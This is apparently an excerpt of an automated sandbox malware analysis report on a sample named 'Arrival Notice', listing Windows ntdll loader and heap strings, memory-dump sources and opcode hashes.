                                                                              • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                              • API String ID: 0-1468400865
                                                                              Strings
                                                                              • LdrpDynamicShimModule, xrefs: 015DA998
                                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 015DA992
                                                                              • apphelp.dll, xrefs: 01592462
                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015DA9A2
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                              • API String ID: 0-176724104
                                                                              Strings
                                                                              • HEAP: , xrefs: 01583264
                                                                              • HEAP[%wZ]: , xrefs: 01583255
                                                                              • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0158327D
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                              • API String ID: 0-617086771
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                              • API String ID: 0-4253913091
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $@
                                                                              • API String ID: 0-1077428164
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                                              • API String ID: 0-2779062949
                                                                              Strings
                                                                              • Failed to allocated memory for shimmed module list, xrefs: 015DA10F
                                                                              • LdrpCheckModule, xrefs: 015DA117
                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015DA121
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                              • API String ID: 0-161242083
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                              • API String ID: 0-1334570610
                                                                              Strings
                                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 015E82DE
                                                                              • Failed to reallocate the system dirs string !, xrefs: 015E82D7
                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015E82E8
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                              • API String ID: 0-1783798831
                                                                              Strings
                                                                              • @, xrefs: 0162C1F1
                                                                              • PreferredUILanguages, xrefs: 0162C212
                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0162C1C5
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                              • API String ID: 0-2968386058
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                              • API String ID: 0-1373925480
                                                                              Strings
                                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 015F4888
                                                                              • LdrpCheckRedirection, xrefs: 015F488F
                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 015F4899
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                              • API String ID: 0-3154609507
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                              • API String ID: 0-2558761708
                                                                              Strings
                                                                              • LdrpInitializationFailure, xrefs: 015F20FA
                                                                              • Process initialization failed with status 0x%08lx, xrefs: 015F20F3
                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015F2104
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                              • API String ID: 0-2986994758
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: ___swprintf_l
                                                                              • String ID: #%u
                                                                              • API String ID: 48624451-232158463
                                                                              Strings
                                                                              • LdrResSearchResource Enter, xrefs: 0157AA13
                                                                              • LdrResSearchResource Exit, xrefs: 0157AA25
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                              • API String ID: 0-4066393604
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: `$`
                                                                              • API String ID: 0-197956300
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID: Legacy$UEFI
                                                                              • API String ID: 2994545307-634100481
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$MUI
                                                                              • API String ID: 0-17815947
                                                                              Strings
                                                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0157063D
                                                                              • kLsE, xrefs: 01570540
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                              • API String ID: 0-2547482624
                                                                              Strings
                                                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 0157A2FB
                                                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 0157A309
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                              • API String ID: 0-2876891731
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID: Cleanup Group$Threadpool!
                                                                              • API String ID: 2994545307-4008356553
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: MUI
                                                                              • API String ID: 0-1339004836
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID: 0-3916222277
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID: 0-3916222277
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: GlobalTags
                                                                              • API String ID: 0-1106856819
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: .mui
                                                                              • API String ID: 0-1199573805
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: EXT-
                                                                              • API String ID: 0-1948896318
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: BinaryHash
                                                                              • API String ID: 0-2202222882
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ;bY
                                                                              • API String ID: 0-3928238319
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: #
                                                                              • API String ID: 0-1885708031
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: BinaryName
                                                                              • API String ID: 0-215506332
                                                                              Strings
                                                                              • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 015F895E
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                              • API String ID: 0-702105204
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e467a294ae2d349e3c0e4623c757047d8789ceb6114ad1c2715739872e7de7ec
                                                                              • Instruction ID: 661e1d7b0e1acc5bc328a8d38569023e9de8833230f85fe0c04e1d1f510b0b46
                                                                              • Opcode Fuzzy Hash: e467a294ae2d349e3c0e4623c757047d8789ceb6114ad1c2715739872e7de7ec
                                                                              • Instruction Fuzzy Hash: 37D1E371E0060A8BDF1ACF58CC41AFFB7F9BF84314F188169D955A7281E735E9068B60
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5f46cd76a18bb7ef6fbd1b752f1142e38fdc4eca6a444a67ce1a455e904a18fd
                                                                              • Instruction ID: 332c4da265ea01087de1ad345310469c5963f4664378914f8e69eb43f9f4b321
                                                                              • Opcode Fuzzy Hash: 5f46cd76a18bb7ef6fbd1b752f1142e38fdc4eca6a444a67ce1a455e904a18fd
                                                                              • Instruction Fuzzy Hash: 95E19D71608742CFD715DF28D490A6ABBE0FF89304F048A6DE9999B351EB31E905CB92
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 54f5fb38c88594b3aecbc7a70b6eda7b5975d2ba179429dd0033d02887332c2c
                                                                              • Instruction ID: c37e4ae4e10bf27ff699232805c9af4a90e2e341df18eba405b5159e845d3036
                                                                              • Opcode Fuzzy Hash: 54f5fb38c88594b3aecbc7a70b6eda7b5975d2ba179429dd0033d02887332c2c
                                                                              • Instruction Fuzzy Hash: 62D1D071A003079FDB14CF68C891ABE77E9BFA4744F14462DE9169F280E734E954CBA0
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                              • Instruction ID: 70b5dd4424d9a0d2bcefd7c26e212cdb6fb4cf5e5482f410feaaa080a9973688
                                                                              • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                              • Instruction Fuzzy Hash: F1B14D75A00609AFDF24DB99C944EAFBBB9FF84304F14446DAB42AB794DB34E905CB10
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                              • Instruction ID: 8e3df6599697a9d59582918a8b8adb4320d8d7a1a4ee98ea79320b91b4fe3a5d
                                                                              • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                              • Instruction Fuzzy Hash: FAB1D731604646AFDB25EB6CC850BBEBBF6BF84204F140599E652EF391D730E945CBA0
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 1786e11df357676dd17476db79c9749b0584af00547219044a3381bd33055a66
                                                                              • Instruction ID: fd6dcde378c0b0d57d98b7ddb5c739be619b98a2b36c89a5be5b3e17b8284d7a
                                                                              • Opcode Fuzzy Hash: 1786e11df357676dd17476db79c9749b0584af00547219044a3381bd33055a66
                                                                              • Instruction Fuzzy Hash: E2C147746083419FE764CF19C485BAEBBE5FF88304F44496DE9898B291E774E908CB92
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6e3120f01c6f9ea88967ec3c54c24642ac79e2ebb4546abfda54c9eac2330668
                                                                              • Instruction ID: cd0a72eaf00692dc742b02b6a70cc5fce9f160815650481b714f939c2c77bb76
                                                                              • Opcode Fuzzy Hash: 6e3120f01c6f9ea88967ec3c54c24642ac79e2ebb4546abfda54c9eac2330668
                                                                              • Instruction Fuzzy Hash: 77B17170A0026A8BDB64DF68C890BADB7F5FF94700F0485E9D54AEB241EB70DD85CB64
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8ed002d9d5eac150019c8794ec2469a0a868b5518e0584c15ffb9cee27a2ffc3
                                                                              • Instruction ID: 0de7e0976263270a0490f2a2678393e2ab3f22ac504d3bc2f97c149047d54599
                                                                              • Opcode Fuzzy Hash: 8ed002d9d5eac150019c8794ec2469a0a868b5518e0584c15ffb9cee27a2ffc3
                                                                              • Instruction Fuzzy Hash: C5A12431E00256AFEF31DB5CD845BAEBBA4FB40754F050126EA12AF291D774AD41CBD2
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4f9b1a893513f3decea197bb54c217d2781b49ae8a0471c53d413c1ba7d33fac
                                                                              • Instruction ID: b6c507cc148461aba2b5e8b9057a0c151cc4a3dc6490b8312656dc3c381fc230
                                                                              • Opcode Fuzzy Hash: 4f9b1a893513f3decea197bb54c217d2781b49ae8a0471c53d413c1ba7d33fac
                                                                              • Instruction Fuzzy Hash: D7A1AE70A016169BDB25CF69C9D4BAFB7F5FF44318F14442AEA059F281EB38E815CB90
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: bdb6dd692b14d2aaca737e218892d98b74e1d00372143a4455a15fd7f11f8568
                                                                              • Instruction ID: afe33792df5f28be424672db8667e5c560bb59a1368358cba4d3706e71229930
                                                                              • Opcode Fuzzy Hash: bdb6dd692b14d2aaca737e218892d98b74e1d00372143a4455a15fd7f11f8568
                                                                              • Instruction Fuzzy Hash: 5DA1CD72A10212AFD711DF28CD81B6ABBE9FF88704F054528E585EB761DB74EC01CB91
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                              • Instruction ID: 04678b34d150598a806d450a99d0d02416224c0119daebc6f77e75a5dc6fe926
                                                                              • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                              • Instruction Fuzzy Hash: 60B14D71E0061ADFDF29CFA9D890AADBBB5FF88310F24816DE954A7350D730A941CB94
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d2c83607bc7049b96eb6f033bd0dca933d8339b5cfa4e8162c30711a4035c6e3
                                                                              • Instruction ID: 94b88468bfc2a1988c8d1caf11214ece656648b9e58362ed3c9a8400d62978e1
                                                                              • Opcode Fuzzy Hash: d2c83607bc7049b96eb6f033bd0dca933d8339b5cfa4e8162c30711a4035c6e3
                                                                              • Instruction Fuzzy Hash: 35916075E00216AFDB15CF68D894BAEBBB6FB48710F15416DE710EF291D734E9009BA0
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 56036ea7f3c02d2dabec0c12dbc62268c0c4ff4cc5e2f186dfb5755b6fa0f423
                                                                              • Instruction ID: 6107a85110aeec4087bfd5d8b80f5304fd2de16c28bbd425f60f649beff9557e
                                                                              • Opcode Fuzzy Hash: 56036ea7f3c02d2dabec0c12dbc62268c0c4ff4cc5e2f186dfb5755b6fa0f423
                                                                              • Instruction Fuzzy Hash: 23911231A006168BEB24BB5DD882B7DBBF1FB94714F054469E905EF291E734DD01CBA2
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 10898b3ea20421e2c10fb1146d79676023bba92f93f1435333f557cb5fa2ab89
                                                                              • Instruction ID: d7a3168c13b4a8a8c1c696b961b958bab87a3c06b946e4487d6e7d8cb71bb009
                                                                              • Opcode Fuzzy Hash: 10898b3ea20421e2c10fb1146d79676023bba92f93f1435333f557cb5fa2ab89
                                                                              • Instruction Fuzzy Hash: 15819571A0061A9FDB24CFA9C940ABEBBF5FB48B04F04852EE455EB740E334DA41CB94
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                              • Instruction ID: 7a57d114ff2cab3f761dbfe1577069cc24ecfae46030f674c565c2330df50c96
                                                                              • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                              • Instruction Fuzzy Hash: B9817D72A0020A9FDF19CF98C890AAEBBB6BFC4310F18856DD956DB345D734E902DB50
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: dc18b595e4f5c1eb09de66eb33619b0c585f8397aad85c9b74c4f8444445607d
                                                                              • Instruction ID: 60d387243ffff1cb1d5958ae2953f01d9297741fa9f5d7a7958335cec629954e
                                                                              • Opcode Fuzzy Hash: dc18b595e4f5c1eb09de66eb33619b0c585f8397aad85c9b74c4f8444445607d
                                                                              • Instruction Fuzzy Hash: F3817F71A40609EFDB25CFA9C881AEEBBF9FF88314F50442AE555AB250D730BC45CB60
                                                                              Memory Dump Source
